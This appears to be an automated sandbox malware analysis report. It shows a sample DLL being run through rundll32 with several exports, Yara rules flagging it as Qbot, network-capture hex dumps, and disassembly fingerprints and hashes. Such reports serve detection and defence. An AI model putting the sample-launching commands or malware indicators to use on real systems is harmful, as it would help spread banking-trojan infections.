                                                                                                                                                                        2023-06-02 11:13:21 UTC851INData Raw: 65 74 65 63 74 28 70 69 78 65 6c 44 65 74 65 63 74 55 72 6c 2c 20 66 75 6e 63 74 69 6f 6e 28 75 73 65 73 41 42 50 29 20 7b 0a 20 20 20 20 20 20 20 20 69 66 20 28 75 73 65 73 41 42 50 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 65 78 70 69 72 65 73 20 3d 20 6e 65 77 20 44 61 74 65 28 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 65 78 70 69 72 65 73 2e 73 65 74 4d 69 6e 75 74 65 73 28 65 78 70 69 72 65 73 2e 67 65 74 4d 69 6e 75 74 65 73 28 29 20 2b 20 63 6f 6f 6b 69 65 44 75 72 61 74 69 6f 6e 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 61 54 72 6b 20 3d 20 27 32 27 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 2e 77 61 66 65 72 2e 75 74 69 6c 73 2e 73 65 74 43 6f 6f 6b 69 65 28 63 6f 6f 6b 69 65 4e 61 6d 65 2c 20 27 32 27 2c 20 7b 65 78
                                                                                                                                                                        Data Ascii: etect(pixelDetectUrl, function(usesABP) { if (usesABP) { var expires = new Date(); expires.setMinutes(expires.getMinutes() + cookieDuration); daTrk = '2'; w.wafer.utils.setCookie(cookieName, '2', {ex
                                                                                                                                                                        2023-06-02 11:13:21 UTC853INData Raw: 73 74 20 70 6f 73 69 74 69 6f 6e 20 6f 66 20 70 6f 73 69 74 69 6f 6e 73 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 73 74 20 61 64 70 6f 73 4e 6f 64 65 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 60 23 24 7b 70 6f 73 69 74 69 6f 6e 7d 60 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 61 64 70 6f 73 4e 6f 64 65 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 64 70 6f 73 4e 6f 64 65 43 6f 75 6e 74 20 2b 3d 20 31 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 61 64 70 6f 73 4e 6f 64 65 2e 6f 66 66 73 65 74 48 65 69 67 68 74 20 3d 3d 3d 20 30 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 69 64 65 6e 50 6f 73 4e 6f 64 65 43 6f 75 6e 74 20 2b
                                                                                                                                                                        Data Ascii: st position of positions) { const adposNode = document.querySelector(`#${position}`); if (adposNode) { adposNodeCount += 1; if (adposNode.offsetHeight === 0) { hidenPosNodeCount +
                                                                                                                                                                        2023-06-02 11:13:21 UTC854INData Raw: 20 7d 0a 0a 20 20 20 20 2f 2f 20 69 66 20 28 64 61 62 43 6f 6e 66 69 67 2e 65 6e 61 62 6c 65 41 42 50 44 65 74 65 63 74 69 6f 6e 20 26 26 20 64 61 54 72 6b 20 3d 3d 3d 20 27 31 27 29 20 7b 20 2f 2f 20 77 69 6c 6c 20 75 6e 63 6f 6d 6d 65 6e 74 20 77 68 65 6e 20 77 65 20 63 61 6e 20 64 65 74 65 63 74 20 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6c 6c 61 70 73 65 64 0a 20 20 20 20 69 66 20 28 64 61 62 43 6f 6e 66 69 67 2e 65 6e 61 62 6c 65 41 42 50 44 65 74 65 63 74 69 6f 6e 29 20 7b 0a 20 20 20 20 20 20 20 20 64 65 74 65 63 74 41 42 50 28 64 61 54 72 6b 29 3b 0a 20 20 20 20 7d 0a 7d 3b 0a 0a 77 2e 77 61 66 65 72 20 26 26 20 77 2e 77 61 66 65 72 2e 75 74 69 6c 73 20 26 26 20 77 2e 77 61 66 65 72 2e 72 65 61 64 79 20 20 26 26 20 77 2e 77 61 66 65 72 2e 72 65 61 64
                                                                                                                                                                        Data Ascii: } // if (dabConfig.enableABPDetection && daTrk === '1') { // will uncomment when we can detect container collapsed if (dabConfig.enableABPDetection) { detectABP(daTrk); }};w.wafer && w.wafer.utils && w.wafer.ready && w.wafer.read


                                                                                                                                                                        Click to jump to process

                                                                                                                                                                        Click to jump to process

                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                        Click to jump to process

                                                                                                                                                                        Target ID:1
                                                                                                                                                                        Start time:13:10:07
                                                                                                                                                                        Start date:02/06/2023
                                                                                                                                                                        Path:C:\Windows\System32\loaddll32.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:loaddll32.exe "C:\Users\user\Desktop\distantly.dat.dll"
                                                                                                                                                                        Imagebase:0xf10000
                                                                                                                                                                        File size:126464 bytes
                                                                                                                                                                        MD5 hash:3B4636AE519868037940CA5C4272091B
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:moderate

                                                                                                                                                                        Target ID:2
                                                                                                                                                                        Start time:13:10:07
                                                                                                                                                                        Start date:02/06/2023
                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                        Imagebase:0x7ff7c72c0000
                                                                                                                                                                        File size:625664 bytes
                                                                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high

                                                                                                                                                                        Target ID:3
                                                                                                                                                                        Start time:13:10:07
                                                                                                                                                                        Start date:02/06/2023
                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\distantly.dat.dll",#1
                                                                                                                                                                        Imagebase:0xd90000
                                                                                                                                                                        File size:232960 bytes
                                                                                                                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high

                                                                                                                                                                        Target ID:4
                                                                                                                                                                        Start time:13:10:07
                                                                                                                                                                        Start date:02/06/2023
                                                                                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:rundll32.exe C:\Users\user\Desktop\distantly.dat.dll,lcopy_block_row
                                                                                                                                                                        Imagebase:0x1260000
                                                                                                                                                                        File size:61952 bytes
                                                                                                                                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high

                                                                                                                                                                        Target ID:5
                                                                                                                                                                        Start time:13:10:07
                                                                                                                                                                        Start date:02/06/2023
                                                                                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:rundll32.exe "C:\Users\user\Desktop\distantly.dat.dll",#1
                                                                                                                                                                        Imagebase:0x1260000
                                                                                                                                                                        File size:61952 bytes
                                                                                                                                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high

                                                                                                                                                                        Target ID:9
                                                                                                                                                                        Start time:13:10:08
                                                                                                                                                                        Start date:02/06/2023
                                                                                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3912 -s 672
                                                                                                                                                                        Imagebase:0xd50000
                                                                                                                                                                        File size:434592 bytes
                                                                                                                                                                        MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high

                                                                                                                                                                        Target ID:10
                                                                                                                                                                        Start time:13:10:08
                                                                                                                                                                        Start date:02/06/2023
                                                                                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7080 -s 652
                                                                                                                                                                        Imagebase:0xd50000
                                                                                                                                                                        File size:434592 bytes
                                                                                                                                                                        MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high

                                                                                                                                                                        Target ID:11
                                                                                                                                                                        Start time:13:10:10
                                                                                                                                                                        Start date:02/06/2023
                                                                                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:rundll32.exe C:\Users\user\Desktop\distantly.dat.dll,lcopy_sample_rows
                                                                                                                                                                        Imagebase:0x1260000
                                                                                                                                                                        File size:61952 bytes
                                                                                                                                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                                                        Target ID:12
                                                                                                                                                                        Start time:13:10:13
                                                                                                                                                                        Start date:02/06/2023
                                                                                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:rundll32.exe C:\Users\user\Desktop\distantly.dat.dll,ldiv_round_up
                                                                                                                                                                        Imagebase:0x1260000
                                                                                                                                                                        File size:61952 bytes
                                                                                                                                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                                                        Target ID:13
                                                                                                                                                                        Start time:13:10:17
                                                                                                                                                                        Start date:02/06/2023
                                                                                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:rundll32.exe "C:\Users\user\Desktop\distantly.dat.dll",lcopy_block_row
                                                                                                                                                                        Imagebase:0x1260000
                                                                                                                                                                        File size:61952 bytes
                                                                                                                                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                                                        Target ID:14
                                                                                                                                                                        Start time:13:10:17
                                                                                                                                                                        Start date:02/06/2023
                                                                                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:rundll32.exe "C:\Users\user\Desktop\distantly.dat.dll",lcopy_sample_rows
                                                                                                                                                                        Imagebase:0x1260000
                                                                                                                                                                        File size:61952 bytes
                                                                                                                                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                                                        Target ID:15
                                                                                                                                                                        Start time:13:10:17
                                                                                                                                                                        Start date:02/06/2023
                                                                                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:rundll32.exe "C:\Users\user\Desktop\distantly.dat.dll",ldiv_round_up
                                                                                                                                                                        Imagebase:0x1260000
                                                                                                                                                                        File size:61952 bytes
                                                                                                                                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                                                        Target ID:16
                                                                                                                                                                        Start time:13:10:17
                                                                                                                                                                        Start date:02/06/2023
                                                                                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:rundll32.exe "C:\Users\user\Desktop\distantly.dat.dll",next
                                                                                                                                                                        Imagebase:0x1260000
                                                                                                                                                                        File size:61952 bytes
                                                                                                                                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Yara matches:
                                                                                                                                                                        • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000010.00000002.576923753.0000000001090000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000010.00000002.576802227.00000000006AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security

                                                                                                                                                                        Target ID:18
                                                                                                                                                                        Start time:13:10:17
                                                                                                                                                                        Start date:02/06/2023
                                                                                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:rundll32.exe "C:\Users\user\Desktop\distantly.dat.dll",lround_up
                                                                                                                                                                        Imagebase:0x1260000
                                                                                                                                                                        File size:61952 bytes
                                                                                                                                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                                                        Target ID:19
                                                                                                                                                                        Start time:13:10:17
                                                                                                                                                                        Start date:02/06/2023
                                                                                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:rundll32.exe "C:\Users\user\Desktop\distantly.dat.dll",lpeg_write_tables
                                                                                                                                                                        Imagebase:0x1260000
                                                                                                                                                                        File size:61952 bytes
                                                                                                                                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                                                        Target ID:20
                                                                                                                                                                        Start time:13:10:17
                                                                                                                                                                        Start date:02/06/2023
                                                                                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7280 -s 652
                                                                                                                                                                        Imagebase:0xd50000
                                                                                                                                                                        File size:434592 bytes
                                                                                                                                                                        MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                                                        Target ID:22
                                                                                                                                                                        Start time:13:10:17
                                                                                                                                                                        Start date:02/06/2023
                                                                                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7352 -s 660
                                                                                                                                                                        Imagebase:0xd50000
                                                                                                                                                                        File size:434592 bytes
                                                                                                                                                                        MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                                                        Target ID:23
                                                                                                                                                                        Start time:13:10:21
                                                                                                                                                                        Start date:02/06/2023
                                                                                                                                                                        Path:C:\Windows\SysWOW64\wermgr.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:C:\Windows\SysWOW64\wermgr.exe
                                                                                                                                                                        Imagebase:0x1010000
                                                                                                                                                                        File size:191904 bytes
                                                                                                                                                                        MD5 hash:CCF15E662ED5CE77B5FF1A7AAE305233
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                                                        Reset < >
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.565622867.000000006AD81000.00000020.00000001.01000000.00000005.sdmp, Offset: 6AD80000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.565617607.000000006AD80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565680610.000000006ADC7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565680610.000000006ADD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565680610.000000006ADEA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565711351.000000006ADF3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565719265.000000006ADF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565731324.000000006ADF7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565731324.000000006ADFA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_6ad80000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressHandleModuleProc$LibraryLoad
                                                                                                                                                                          • String ID: _Jv_RegisterClasses$__register_frame_info$libgcc_s_dw2-1.dll$libgcj-13.dll
                                                                                                                                                                          • API String ID: 652391981-159345992
                                                                                                                                                                          • Opcode ID: 174b7f510952e3c1a7d92b62687ddb2c84a904ca156fc8ec012c0c85c4e93b87
                                                                                                                                                                          • Instruction ID: d675804f6bb312547546230e90a1c997c02a84e616a9ee9daeb6eabfd02d7456
                                                                                                                                                                          • Opcode Fuzzy Hash: 174b7f510952e3c1a7d92b62687ddb2c84a904ca156fc8ec012c0c85c4e93b87
                                                                                                                                                                          • Instruction Fuzzy Hash: B00161F1904200ABEB007F78964675E7EF8AF05212F83452CE896C7304EE34E958DBA3
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.565622867.000000006AD81000.00000020.00000001.01000000.00000005.sdmp, Offset: 6AD80000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.565617607.000000006AD80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565680610.000000006ADC7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565680610.000000006ADD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565680610.000000006ADEA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565711351.000000006ADF3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565719265.000000006ADF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565731324.000000006ADF7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565731324.000000006ADFA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_6ad80000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CriticalExceptionFilterProcessSectionUnhandled$CurrentEnterErrorLastLeaveTerminateValueabort
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2989179798-0
                                                                                                                                                                          • Opcode ID: 9065017ed5234fb123e44d6708054de625382f9d5a539402cf28e2b5284c4d17
                                                                                                                                                                          • Instruction ID: f99962f86f4e8b76b4a3158b28e751bbda0fe3d772afa358b4769054948631d1
                                                                                                                                                                          • Opcode Fuzzy Hash: 9065017ed5234fb123e44d6708054de625382f9d5a539402cf28e2b5284c4d17
                                                                                                                                                                          • Instruction Fuzzy Hash: BB2146F1944244CFEF00AFA9E68954A7BF4AB06305F424569DD89CB304EB34A9588FA3
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • GetSystemTimeAsFileTime.KERNEL32 ref: 6ADC52F7
                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 6ADC5308
                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 6ADC5312
                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 6ADC531A
                                                                                                                                                                          • QueryPerformanceCounter.KERNEL32 ref: 6ADC532B
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.565622867.000000006AD81000.00000020.00000001.01000000.00000005.sdmp, Offset: 6AD80000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.565617607.000000006AD80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565680610.000000006ADC7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565680610.000000006ADD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565680610.000000006ADEA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565711351.000000006ADF3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565719265.000000006ADF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565731324.000000006ADF7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565731324.000000006ADFA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_6ad80000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1445889803-0
                                                                                                                                                                          • Opcode ID: 15bf34995bc2e6ba5b4e109c97f67aa5a0ff947541128098c1ae30e2d0d30fa0
                                                                                                                                                                          • Instruction ID: 698e9afb54e5ee92a4174f6037402d37887ea11ce9714d7ecb95810e9d252d71
                                                                                                                                                                          • Opcode Fuzzy Hash: 15bf34995bc2e6ba5b4e109c97f67aa5a0ff947541128098c1ae30e2d0d30fa0
                                                                                                                                                                          • Instruction Fuzzy Hash: D711F6B5848300CFEB109F29D54411EBBF5BB8A344F86492DE986E7310EB35EA458F82
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.565622867.000000006AD81000.00000020.00000001.01000000.00000005.sdmp, Offset: 6AD80000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.565617607.000000006AD80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565680610.000000006ADC7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565680610.000000006ADD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565680610.000000006ADEA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565711351.000000006ADF3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565719265.000000006ADF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565731324.000000006ADF7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565731324.000000006ADFA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_6ad80000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 766fee892abcdd184b753aabadc84f9169730b4caa204f54eb7b665d7fab028d
                                                                                                                                                                          • Instruction ID: df671b935b9de51f34eab4ecbecfcee19f022cede73c8c02bb2254cf0852d286
                                                                                                                                                                          • Opcode Fuzzy Hash: 766fee892abcdd184b753aabadc84f9169730b4caa204f54eb7b665d7fab028d
                                                                                                                                                                          • Instruction Fuzzy Hash: 13027071908712CBC324DF29C48056BF7F1FF98701F068A2EE9D99B691E774A504CB96
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.565622867.000000006AD81000.00000020.00000001.01000000.00000005.sdmp, Offset: 6AD80000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.565617607.000000006AD80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565680610.000000006ADC7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565680610.000000006ADD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565680610.000000006ADEA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565711351.000000006ADF3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565719265.000000006ADF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565731324.000000006ADF7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565731324.000000006ADFA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_6ad80000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 7cb29f4f83f96f10b57247a4e245e378bcbca1f01bb03e96992d4c139055477f
                                                                                                                                                                          • Instruction ID: 08164c3520fe84e7db1f8187aa699682728efeeda4d098d6e27e086dc2b2d681
                                                                                                                                                                          • Opcode Fuzzy Hash: 7cb29f4f83f96f10b57247a4e245e378bcbca1f01bb03e96992d4c139055477f
                                                                                                                                                                          • Instruction Fuzzy Hash: 13C190729087159BC328CF28C58022BF7E1FF95705F068A6EE9C58B2A1E735E905CB81
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.565622867.000000006AD81000.00000020.00000001.01000000.00000005.sdmp, Offset: 6AD80000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.565617607.000000006AD80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565680610.000000006ADC7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565680610.000000006ADD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565680610.000000006ADEA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565711351.000000006ADF3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565719265.000000006ADF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565731324.000000006ADF7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565731324.000000006ADFA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_6ad80000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 689124f1c0e529a35433716c60f009670efef5b3d9363f5ef2cc53f24d38dee5
